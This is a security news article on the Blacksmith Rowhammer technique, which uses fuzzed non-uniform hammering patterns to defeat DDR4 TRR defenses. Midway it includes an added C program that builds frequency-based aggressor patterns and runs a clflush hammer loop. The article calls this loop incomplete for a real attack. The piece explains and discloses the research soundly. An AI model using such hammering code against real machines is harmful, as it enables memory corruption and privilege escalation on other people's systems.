Researchers have identified a new Rowhammer technique that bypasses the existing in-DRAM defenses against Rowhammer attacks. Named Blacksmith, the method lets attackers trigger bit flips in DDR4 memory, which can be turned into memory corruption and privilege escalation, among other outcomes.
What has been discovered?
Researchers from the COMSEC group at ETH Zurich have demonstrated that Rowhammer bit flips can still be triggered on the DDR4 DRAM used in commercially available devices.
Blacksmith (tracked as CVE-2021-42114) is a fuzzing-based technique; unlike previous Rowhammer methods, it searches for non-uniform hammering patterns, and those are what get past the defenses.
Previous hammering methods accessed their aggressor rows in uniform patterns, with every aggressor hammered equally often, which is exactly the behaviour that in-DRAM mitigations are built to detect.
Blacksmith achieves the same bit flips while exploring non-uniform patterns instead.
A bit about Rowhammer
Rowhammer is a known vulnerability in devices using DRAM. Repeatedly activating ("hammering") a row accelerates the leakage of electrical charge from cells in the physically adjacent rows, which lets attackers induce bit flips (i.e. flip zeros into ones and vice versa) in memory they do not own.
To mitigate Rowhammer, memory manufacturers implemented a method called Target Row Refresh (TRR), which detects frequently activated rows and refreshes their neighbours before they lose their charge, and which was expected to protect DDR4 from Rowhammer attacks.
Blacksmith, however, describes hammering patterns in terms of order, regularity, and intensity (frequency, phase, and amplitude in the researchers' terminology) and builds frequency-based Rowhammer patterns from those parameters.
These parameters are fed into the Blacksmith fuzzer, which searches for the values that produce bit flips on a specific DIMM, since working patterns differ from device to device.
In the experiment, the research team ran the fuzzer for 12 hours per DIMM; the best pattern it found was then swept over a contiguous 256 MB memory area to count the bit flips it produced.
To further validate their findings, the researchers performed test attacks and recovered the private key of an RSA-2048 key pair used for SSH host authentication.
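The following C program is an added example, not code from the COMSEC group or the Blacksmith fuzzer. It shows the two ideas above in working form: a double-sided aggressor pair described by period (frequency), phase and amplitude is expanded into a non-uniform access sequence, a simple check confirms the sequence really is non-uniform (different rows are hit different numbers of times), and a hammer loop replays it with cache-line flushes and counts changed bytes. The 8 KiB row stride, the row numbers, the filler rows and the sample aggressor parameters are assumptions for illustration; on a real DIMM the physical-address-to-row mapping has to be reverse engineered and the buffer must be physically contiguous, neither of which this example does.

```c
/* Added example, not code from the Blacksmith paper or its fuzzer. Expands a
 * frequency-domain description of aggressor rows into an access sequence and
 * replays it over a user-space buffer with cache-line flushes. Row stride,
 * row numbers and round counts are assumed values for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <emmintrin.h>   /* _mm_clflush */
#endif

#define MAX_PATTERN 512
#define ROW_BYTES   8192u   /* assumed DRAM row stride; the real mapping is DIMM-specific */
#define NUM_ROWS    64
#define FILLER_ROW  (-1)

/* One double-sided aggressor pair described the Blacksmith way: how often it
 * recurs within the pattern (period, in access slots), where it starts (phase)
 * and how many consecutive (a,b) activations it gets per occurrence (amplitude). */
typedef struct {
    int row_a, row_b;
    int period, phase, amplitude;
} aggressor_t;

/* Expand the aggressors into `len` access slots. Each slot holds a row index;
 * slots nobody claims stay FILLER_ROW. Returns the number of claimed slots. */
int build_pattern(const aggressor_t *aggs, int n_aggs, int len, int *out)
{
    int claimed = 0;
    for (int i = 0; i < len; i++) out[i] = FILLER_ROW;
    for (int a = 0; a < n_aggs; a++) {
        const aggressor_t *g = &aggs[a];
        for (int t = g->phase; t < len; t += g->period)
            for (int k = 0; k < 2 * g->amplitude && t + k < len; k++) {
                if (out[t + k] != FILLER_ROW) continue;   /* first aggressor wins the slot */
                out[t + k] = (k % 2 == 0) ? g->row_a : g->row_b;
                claimed++;
            }
    }
    return claimed;
}

/* Number of distinct per-row access counts. A classic uniform double-sided
 * pattern gives 1; a non-uniform Blacksmith-style pattern gives more. */
int distinct_access_counts(const int *pattern, int len)
{
    int counts[NUM_ROWS] = {0}, seen[MAX_PATTERN + 1] = {0}, distinct = 0;
    for (int i = 0; i < len; i++)
        if (pattern[i] >= 0 && pattern[i] < NUM_ROWS) counts[pattern[i]]++;
    for (int r = 0; r < NUM_ROWS; r++)
        if (counts[r] > 0 && counts[r] <= MAX_PATTERN && !seen[counts[r]]) {
            seen[counts[r]] = 1;
            distinct++;
        }
    return distinct;
}

static void access_and_flush(volatile uint8_t *p)
{
    (void)*p;                                   /* activate the row */
#if defined(__x86_64__) || defined(__i386__)
    _mm_clflush((const void *)(uintptr_t)p);    /* make the next access go to DRAM again */
#endif
}

/* Fill the buffer, replay the pattern `rounds` times, and count bytes that
 * changed. Filler slots go to rows 56-63, away from the aggressors. On an
 * ordinary heap buffer the rows are not physically adjacent, so 0 is expected. */
long hammer_and_count_flips(uint8_t *buf, const int *pattern, int len, long rounds, uint8_t fill)
{
    size_t size = (size_t)NUM_ROWS * ROW_BYTES;
    memset(buf, fill, size);
    for (long r = 0; r < rounds; r++)
        for (int i = 0; i < len; i++) {
            int row = (pattern[i] == FILLER_ROW) ? NUM_ROWS - 1 - (i % 8) : pattern[i];
            access_and_flush(buf + (size_t)row * ROW_BYTES);
        }
    long flips = 0;
    for (size_t i = 0; i < size; i++) flips += (buf[i] != fill);
    return flips;
}

/* Constructed sample: three pairs with different period/phase/amplitude, like
 * one candidate the fuzzer would try. 64 slots stand in for one refresh interval. */
static const aggressor_t SAMPLE[] = { {10, 12, 8, 0, 2}, {20, 22, 8, 4, 1}, {30, 32, 16, 6, 1} };
#define SAMPLE_LEN 64

int sample_claimed(void)
{
    int pat[SAMPLE_LEN];
    return build_pattern(SAMPLE, 3, SAMPLE_LEN, pat);
}

int sample_distinct(void)
{
    int pat[SAMPLE_LEN];
    build_pattern(SAMPLE, 3, SAMPLE_LEN, pat);
    return distinct_access_counts(pat, SAMPLE_LEN);
}

long sample_flips(long rounds)
{
    int pat[SAMPLE_LEN];
    build_pattern(SAMPLE, 3, SAMPLE_LEN, pat);
    uint8_t *buf = malloc((size_t)NUM_ROWS * ROW_BYTES);
    if (!buf) return -1;
    long flips = hammer_and_count_flips(buf, pat, SAMPLE_LEN, rounds, 0x55);
    free(buf);
    return flips;
}

int main(void)
{
    printf("claimed slots: %d/%d, distinct access counts: %d, flips: %ld\n",
           sample_claimed(), SAMPLE_LEN, sample_distinct(), sample_flips(2000));
    return 0;
}
```

With the sample parameters the first pair is hit 16 times per 64-slot window, the second 8 times and the third 4 times, so the sequence would look nothing like the evenly spaced activations a TRR heuristic is tuned for. The flip count stays at zero here because a small heap buffer gives no control over which physical rows are neighbours; a real attack needs a large physically contiguous region (the 256 MB area mentioned above) and a known address-to-row mapping, and leaves the parameter search to a fuzzer rather than hand-picking them.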
Possible solution
The latest DDR5 DRAM modules on the market are thought to be unaffected by Blacksmith, although this has not been demonstrated.
In DDR5, TRR is replaced by Refresh Management (RFM). This mechanism keeps a counter of activations per bank and, once the counter reaches a threshold, issues selective refreshes.
This, in turn, makes the kind of scalable fuzzing Blacksmith relies on much harder against DDR5 DRAM.
Ending notes
The Blacksmith findings were reported to several DRAM manufacturers, including Micron, Samsung, and SK Hynix, and Microsoft, Intel, Google, Oracle, and AMD confirmed them. From an end-user perspective, moving to the latest hardware appears to be the most viable option for protecting against this threat, since the patterns target the DRAM itself and cannot be patched in software.